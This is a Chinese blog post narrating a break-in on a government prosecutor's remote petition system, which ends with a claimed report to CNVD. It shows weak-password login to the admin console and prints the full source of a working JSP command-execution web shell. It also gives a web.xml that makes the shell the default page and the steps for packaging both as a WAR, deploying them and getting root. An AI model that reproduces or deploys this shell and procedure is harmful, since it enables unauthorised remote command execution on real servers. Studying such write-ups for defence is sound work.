记一次zf的实战😀

记一次zf的实战😀

记一次某人民检察院远程接访系统漏洞后台getshell

  • 找到后台管理控制台后(尝试用弱口令进入)

  • 弱口令登录后

  • 找到发布应用程序

  • 准备jsp shell 并保存为zpojerjv.jsp

<%@ page import="java.util.*,java.io.*"%>
<%
%>
<HTML><BODY>
<FORM METHOD="GET" NAME="myform" ACTION="">
<INPUT TYPE="text" NAME="cmd">
<INPUT TYPE="submit" VALUE="Send">
</FORM>
<pre>
<%
if (request.getParameter("cmd") != null) {
out.println("Command: " + request.getParameter("cmd") + "<BR>");
Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
OutputStream os = p.getOutputStream();
InputStream in = p.getInputStream();
DataInputStream dis = new DataInputStream(in);
String disr = dis.readLine();
while ( disr != null ) {
out.println(disr);
disr = dis.readLine();
}
}
%>
</pre>
</BODY></HTML>
  • 准备WEB-INF中的xml文件用来解析jsp木马(把xml文件命名为web.xml并放入WEB-INF文件夹中)

<?xml version="1.0"?>
<!DOCTYPE web-app PUBLIC
"-//Sun Microsystems, Inc.//DTD Web Application 2.3//EN"
"http://java.sun.com/dtd/web-app_2_3.dtd">
<web-app>
<welcome-file-list>
<welcome-file>zpojerjv.jsp</welcome-file>
</welcome-file-list>
</web-app>
  • 如下图桌面上的一个文件夹一个文件

  • 完成后将两个文件打包成zip格式

  • 打包操作如下所示

  • 成功后如下所示,在桌面中会出现shell.zip的压缩包

  • 把压缩包改名为war格式后缀

  • 修改好后上传至发布应用程序

  • 上传成功后能看到下图消息

  • 点击应用程序列表发现shell.war状态已启动

  • 最后点击访问

  • 输入命令whoami 能获取到的权限为root权限

  • 漏洞利用完毕,此服务器可做内网穿透,漏洞危害较大,已提交至CNVD望厂商重视。

文章作者: Fre3L3i
文章链接: http://fre3l3i.github.io/2019/09/16/记一次zf站的实战😀/
版权声明: 本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自 Fre3L3i's blogs

评论